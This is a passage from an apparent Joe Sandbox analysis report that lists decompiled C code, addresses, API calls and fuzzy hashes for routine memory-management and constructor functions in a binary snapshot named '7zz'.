                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0046C0EA
                                                                                                                                      • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                                                                      • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1616793339-0
                                                                                                                                    • Opcode ID: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
                                                                                                                                    • Instruction ID: fa3294983cb7f1a3e0ff108d5f2fbcd3700c82697a380beb40c47041fad90e01
                                                                                                                                    • Opcode Fuzzy Hash: e575e1167a8f99009fb8e2b1a8c0ea7b311c1eb59cc096f5b025c246e8b2173c
                                                                                                                                    • Instruction Fuzzy Hash: 8821CC31A40204EBDB10DFA5DC82BAE7764FB00764F20412BF455E72D1E77D9D41865E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046C0FF Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                    			E0046C0FF(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x47c860);
				_push(E0046CE74);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x496584; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0046E56A(9);
							_v8 = 1;
							_t24 = L0046F866(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								L0046F8BD(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E0046C1C1();
							goto L9;
						}
					} else {
						E0046E56A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = L0046EB0B(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							L0046EB36();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E0046C169();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x496580); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}
















                                                                                                                                    0x0046c102
                                                                                                                                    0x0046c104
                                                                                                                                    0x0046c109
                                                                                                                                    0x0046c10e
                                                                                                                                    0x0046c114
                                                                                                                                    0x0046c115
                                                                                                                                    0x0046c122
                                                                                                                                    0x0046c127
                                                                                                                                    0x0046c12d
                                                                                                                                    0x0046c135
                                                                                                                                    0x0046c175
                                                                                                                                    0x0046c1ca
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c177
                                                                                                                                    0x0046c179
                                                                                                                                    0x0046c17f
                                                                                                                                    0x0046c18f
                                                                                                                                    0x0046c197
                                                                                                                                    0x0046c19c
                                                                                                                                    0x0046c1a5
                                                                                                                                    0x0046c1aa
                                                                                                                                    0x0046c1ad
                                                                                                                                    0x0046c1b1
                                                                                                                                    0x00000000
                                                                                                                                    0x0046c1b6
                                                                                                                                    0x0046c137
                                                                                                                                    0x0046c139
                                                                                                                                    0x0046c13f
                                                                                                                                    0x0046c144
                                                                                                                                    0x0046c14a
                                                                                                                                    0x0046c14f
                                                                                                                                    0x0046c151
                                                                                                                                    0x0046c152
                                                                                                                                    0x0046c153
                                                                                                                                    0x0046c159
                                                                                                                                    0x0046c15a
                                                                                                                                    0x0046c15e
                                                                                                                                    0x0046c163
                                                                                                                                    0x0046c1ba
                                                                                                                                    0x0046c1ba
                                                                                                                                    0x0046c1bc
                                                                                                                                    0x0046c1cb
                                                                                                                                    0x0046c1cb
                                                                                                                                    0x0046c1d3
                                                                                                                                    0x0046c1d3
                                                                                                                                    0x0046c1ba
                                                                                                                                    0x0046c135
                                                                                                                                    0x0046c1dc
                                                                                                                                    0x0046c1e7

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074), ref: 0046C1D3
                                                                                                                                      • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                                                                      • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapInitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 641406236-0
                                                                                                                                    • Opcode ID: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
                                                                                                                                    • Instruction ID: 879b8716ea47b65f01d40709131112694f9f6cb808c508230637e9ff792a2c59
                                                                                                                                    • Opcode Fuzzy Hash: 620c75e95a6c718760a4149e1d88e8a335d05f3eea69c5ea2202f4b68c2d9e00
                                                                                                                                    • Instruction Fuzzy Hash: 0921C872940204EBDB11DB96DC46BEE77B8EB05724F14052BF415A21D1F73C99408E6F
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041741C Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E0041741C(void* __ecx) {
				void* _t50;
				intOrPtr* _t65;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t73;
				void* _t75;

				L0046B890(E00474C5C, _t68);
				_t71 = _t70 - 0x44;
				 *((intOrPtr*)(_t68 - 0x14)) = __ecx + 8;
				E0040862D();
				_t50 = 0;
				_t73 =  *0x490cc4 - _t50; // 0xb
				if(_t73 > 0) {
					 *((intOrPtr*)(_t68 - 0x10)) = 0x490c04;
					do {
						_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x10))));
						L004174E7(_t68 - 0x50);
						 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
						L00403593(_t68 - 0x44,  *_t65);
						 *((intOrPtr*)(_t68 - 0x4c)) =  *((intOrPtr*)(_t65 + 0x28));
						 *((intOrPtr*)(_t68 - 0x48)) =  *((intOrPtr*)(_t65 + 0x2c));
						_push( *((intOrPtr*)(_t65 + 8)));
						_push( *((intOrPtr*)(_t65 + 4)));
						 *((char*)(_t68 - 0x50)) = L0041721B(_t68 - 0x50, _t73) & 0xffffff00 |  *((intOrPtr*)(_t65 + 0x2c)) != 0x00000000;
						 *((char*)(_t68 - 0x18)) =  *((intOrPtr*)(_t65 + 0x24));
						E0040FA26(_t68 - 0x24,  *((intOrPtr*)(_t65 + 0x20)));
						L0046BAB0( *((intOrPtr*)(_t68 - 0x1c)), _t65 + 0xd,  *((intOrPtr*)(_t65 + 0x20)));
						_t71 = _t71 + 0xc;
						_push(_t68 - 0x50); // executed
						E004177F2( *((intOrPtr*)(_t68 - 0x14))); // executed
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						E00405AAF(_t68 - 0x50);
						 *((intOrPtr*)(_t68 - 0x10)) =  *((intOrPtr*)(_t68 - 0x10)) + 4;
						_t50 = _t50 + 1;
						_t75 = _t50 -  *0x490cc4; // 0xb
					} while (_t75 < 0);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return 0;
			}










                                                                                                                                    0x00417421
                                                                                                                                    0x00417426
                                                                                                                                    0x0041742d
                                                                                                                                    0x00417430
                                                                                                                                    0x00417435
                                                                                                                                    0x00417437
                                                                                                                                    0x0041743d
                                                                                                                                    0x00417445
                                                                                                                                    0x0041744c
                                                                                                                                    0x00417452
                                                                                                                                    0x00417454
                                                                                                                                    0x0041745b
                                                                                                                                    0x00417462
                                                                                                                                    0x0041746d
                                                                                                                                    0x00417473
                                                                                                                                    0x00417476
                                                                                                                                    0x00417479
                                                                                                                                    0x0041748b
                                                                                                                                    0x00417491
                                                                                                                                    0x00417498
                                                                                                                                    0x004174a5
                                                                                                                                    0x004174ad
                                                                                                                                    0x004174b3
                                                                                                                                    0x004174b4
                                                                                                                                    0x004174b9
                                                                                                                                    0x004174c0
                                                                                                                                    0x004174c5
                                                                                                                                    0x004174c9
                                                                                                                                    0x004174ca
                                                                                                                                    0x004174ca
                                                                                                                                    0x004174d7
                                                                                                                                    0x004174de
                                                                                                                                    0x004174e6

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00417421
                                                                                                                                      • Part of subcall function 0041721B: __EH_prolog.LIBCMT ref: 00417220
                                                                                                                                      • Part of subcall function 004177F2: __EH_prolog.LIBCMT ref: 004177F7
                                                                                                                                      • Part of subcall function 00405AAF: __EH_prolog.LIBCMT ref: 00405AB4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 98a52f5b629cfcfc39b7e5593c906de4fc14a78073b84d842c9a913c9379cc07
                                                                                                                                    • Instruction ID: a26e6283d8f97d39b918b8293e88733ba3edaa614f90ccffc4ac306d58a1923f
                                                                                                                                    • Opcode Fuzzy Hash: 98a52f5b629cfcfc39b7e5593c906de4fc14a78073b84d842c9a913c9379cc07
                                                                                                                                    • Instruction Fuzzy Hash: 1221BB71D002199FCB10EFE5C9819EEBBB4FF14318F10492EE056A3291DB78AA05CFA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042A3CD Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E0042A3CD(intOrPtr __ecx, void* __eflags) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t48;

				L0046B890(0x476e89, _t48);
				_push(__ecx);
				 *((intOrPtr*)(_t48 - 0x10)) = __ecx;
				_t43 = __ecx + 0x10;
				E00421886(__ecx + 0x10); // executed
				 *((intOrPtr*)(__ecx)) = 0x47af30;
				 *((intOrPtr*)(__ecx + 4)) = 0x47ae54;
				 *((intOrPtr*)(__ecx + 8)) = 0x47ae64;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(_t48 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((char*)(_t48 - 4)) = 1;
				E0042A7A4(__ecx + 0x70, 0);
				_t30 = __ecx + 0x244;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = 0;
				 *((intOrPtr*)(_t30 + 0xc)) = 0;
				 *((intOrPtr*)(_t30 + 0x10)) = 0x10;
				 *_t30 = 0x47b2f8;
				_t31 = __ecx + 0x258;
				 *((intOrPtr*)(_t31 + 4)) = 0;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(_t31 + 0xc)) = 0;
				 *((intOrPtr*)(_t31 + 0x10)) = 8;
				 *_t31 = 0x47a688;
				 *((char*)(_t48 - 4)) = 4;
				 *((intOrPtr*)(__ecx)) = 0x47b374;
				 *((intOrPtr*)(__ecx + 4)) = 0x47b364;
				 *((intOrPtr*)(__ecx + 8)) = 0x47b350;
				 *((intOrPtr*)(__ecx + 0x14)) = 4;
				 *((char*)(__ecx + 0x240)) = 0;
				E00425658(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return __ecx;
			}






                                                                                                                                    0x0042a3d2
                                                                                                                                    0x0042a3d7
                                                                                                                                    0x0042a3dd
                                                                                                                                    0x0042a3e0
                                                                                                                                    0x0042a3e5
                                                                                                                                    0x0042a3ea
                                                                                                                                    0x0042a3f2
                                                                                                                                    0x0042a3f9
                                                                                                                                    0x0042a400
                                                                                                                                    0x0042a403
                                                                                                                                    0x0042a406
                                                                                                                                    0x0042a40c
                                                                                                                                    0x0042a410
                                                                                                                                    0x0042a415
                                                                                                                                    0x0042a41b
                                                                                                                                    0x0042a41e
                                                                                                                                    0x0042a421
                                                                                                                                    0x0042a424
                                                                                                                                    0x0042a42b
                                                                                                                                    0x0042a431
                                                                                                                                    0x0042a437
                                                                                                                                    0x0042a43a
                                                                                                                                    0x0042a43d
                                                                                                                                    0x0042a440
                                                                                                                                    0x0042a447
                                                                                                                                    0x0042a44f
                                                                                                                                    0x0042a453
                                                                                                                                    0x0042a459
                                                                                                                                    0x0042a460
                                                                                                                                    0x0042a467
                                                                                                                                    0x0042a46e
                                                                                                                                    0x0042a474
                                                                                                                                    0x0042a481
                                                                                                                                    0x0042a489

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0042A3D2
                                                                                                                                      • Part of subcall function 00421886: __EH_prolog.LIBCMT ref: 0042188B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
                                                                                                                                    • Instruction ID: 766f131098bcf4af3a9139bea82dcdcfbf831278d29da31b0125813e173acf34
                                                                                                                                    • Opcode Fuzzy Hash: 3f1d036d93fe4a1f0dd6d6d3598b18ac8637590154a54e6563d3fc336d79ae94
                                                                                                                                    • Instruction Fuzzy Hash: 7A21F2B0901744CFC710DF5AC58868AFBE4FB44704F55C9AEC4AE9B621C3B8A948CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00423DB2 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00423DB2(signed int __ecx, void* __eflags) {
				void* _t28;
				intOrPtr* _t42;
				intOrPtr* _t43;
				void* _t49;

				L0046B890(E00476263, _t49);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
				 *(_t49 - 4) = 4;
				E00408604(__ecx + 0xb4);
				 *(_t49 - 4) = 3;
				E00408604(__ecx + 0xa0);
				_t42 = __ecx + 0x8c;
				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
				 *_t42 = 0x47b200;
				 *(_t49 - 4) = 5;
				E0040862D();
				 *(_t49 - 4) = 2;
				E00408604(_t42);
				_t43 = __ecx + 0x78;
				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
				 *_t43 = 0x47b208;
				 *(_t49 - 4) = 6;
				E0040862D();
				 *(_t49 - 4) = 1;
				E00408604(_t43);
				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
				L0040FBE3(__ecx);
				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t28 = L004239EF( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
				return _t28;
			}







                                                                                                                                    0x00423db7
                                                                                                                                    0x00423dbc
                                                                                                                                    0x00423dbd
                                                                                                                                    0x00423dc2
                                                                                                                                    0x00423dcb
                                                                                                                                    0x00423dd2
                                                                                                                                    0x00423ddd
                                                                                                                                    0x00423de1
                                                                                                                                    0x00423de6
                                                                                                                                    0x00423dec
                                                                                                                                    0x00423def
                                                                                                                                    0x00423df7
                                                                                                                                    0x00423dfb
                                                                                                                                    0x00423e02
                                                                                                                                    0x00423e06
                                                                                                                                    0x00423e0b
                                                                                                                                    0x00423e0e
                                                                                                                                    0x00423e11
                                                                                                                                    0x00423e19
                                                                                                                                    0x00423e1d
                                                                                                                                    0x00423e24
                                                                                                                                    0x00423e28
                                                                                                                                    0x00423e2d
                                                                                                                                    0x00423e33
                                                                                                                                    0x00423e38
                                                                                                                                    0x00423e43
                                                                                                                                    0x00423e47
                                                                                                                                    0x00423e51
                                                                                                                                    0x00423e59

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00423DB7
                                                                                                                                      • Part of subcall function 004239EF: __EH_prolog.LIBCMT ref: 004239F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
                                                                                                                                    • Instruction ID: 72112a1eb2b5d99c84f1992f09ae961115561c8040eecd3d47dea80afc4ad4fc
                                                                                                                                    • Opcode Fuzzy Hash: af4ea4ec6c59c69829b991c50310e000d2b28a5cce1b6cadecc5c5d10e518f9b
                                                                                                                                    • Instruction Fuzzy Hash: 28110470A00648CADB04EBA9C11539EFBE59F60308F01459FD092B32D2CFB81B04C7A9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00418E2D Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E00418E2D(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				signed char _t22;
				void* _t24;
				void* _t45;
				void* _t47;
				void* _t52;

				_t52 = __eflags;
				L0046B890(E00474EE0, _t47);
				_t45 = __ecx;
				_t41 = __ecx + 0x14;
				E00401E26(__ecx + 0x14,  *((intOrPtr*)(_t47 + 8)));
				_push( *((intOrPtr*)(_t47 + 0xc)));
				_t21 = L0040B0A0(_t47 - 0x18, _t41);
				 *(_t47 - 4) = 0;
				_t22 = E0040B431(__ecx + 0x20, _t41, _t52,  *_t21); // executed
				asm("sbb bl, bl");
				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
				E00407A18( *((intOrPtr*)(_t47 - 0x18)));
				if( ~_t22 + 1 != 0) {
					 *((intOrPtr*)(_t47 + 8)) = 1;
					L0046B8F4(_t47 + 8, 0x47e128);
				}
				_t24 = E0040862D();
				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
				 *((intOrPtr*)(_t45 + 0x88)) = 0;
				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t24;
			}









                                                                                                                                    0x00418e2d
                                                                                                                                    0x00418e32
                                                                                                                                    0x00418e3c
                                                                                                                                    0x00418e42
                                                                                                                                    0x00418e47
                                                                                                                                    0x00418e4c
                                                                                                                                    0x00418e54
                                                                                                                                    0x00418e60
                                                                                                                                    0x00418e63
                                                                                                                                    0x00418e6f
                                                                                                                                    0x00418e71
                                                                                                                                    0x00418e77
                                                                                                                                    0x00418e7f
                                                                                                                                    0x00418e8a
                                                                                                                                    0x00418e91
                                                                                                                                    0x00418e91
                                                                                                                                    0x00418e99
                                                                                                                                    0x00418e9e
                                                                                                                                    0x00418ea5
                                                                                                                                    0x00418eab
                                                                                                                                    0x00418eb4
                                                                                                                                    0x00418ebc

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00418E32
                                                                                                                                      • Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5
                                                                                                                                      • Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436
                                                                                                                                      • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$ExceptionRaise
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2062786585-0
                                                                                                                                    • Opcode ID: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
                                                                                                                                    • Instruction ID: f1c4790c51f2afa5d83b5d7308df39874a94f843b8eefe83d47d115a6bddce3e
                                                                                                                                    • Opcode Fuzzy Hash: 67be124f8a6059692007feb4e6c0bf1aa0dd9a0595db22b3b05b5781a3304976
                                                                                                                                    • Instruction Fuzzy Hash: 6B01D675A402049EDB20EF26C451ADEBBF5FF84354F00851FE896A32A1CB785649CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00411194 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E00411194(void* __ecx, void* __edx) {
				void* _t17;
				intOrPtr* _t19;
				char _t20;
				void* _t36;
				void* _t41;

				_t17 = L0046B890(E00474258, _t41);
				_t36 = __ecx;
				if( *((intOrPtr*)(__edx + 4)) != 0) {
					_t17 = E00408A3B(__edx);
					_t47 = _t17;
					if(_t17 == 0) {
						L0040B521(_t41 - 0x54);
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						_push(__edx);
						_t19 = L0040B0A0(_t41 - 0x1c, _t36);
						 *(_t41 - 4) = 1;
						_t20 = E0040B431(_t41 - 0x54, _t36, _t47,  *_t19); // executed
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						 *((char*)(_t41 - 0xd)) = _t20;
						E00407A18( *((intOrPtr*)(_t41 - 0x1c)));
						if( *((char*)(_t41 - 0xd)) != 0) {
							E00401E26(__edx, _t41 - 0x2c);
						}
						_t17 = E00407A18( *((intOrPtr*)(_t41 - 0x2c)));
					}
				}
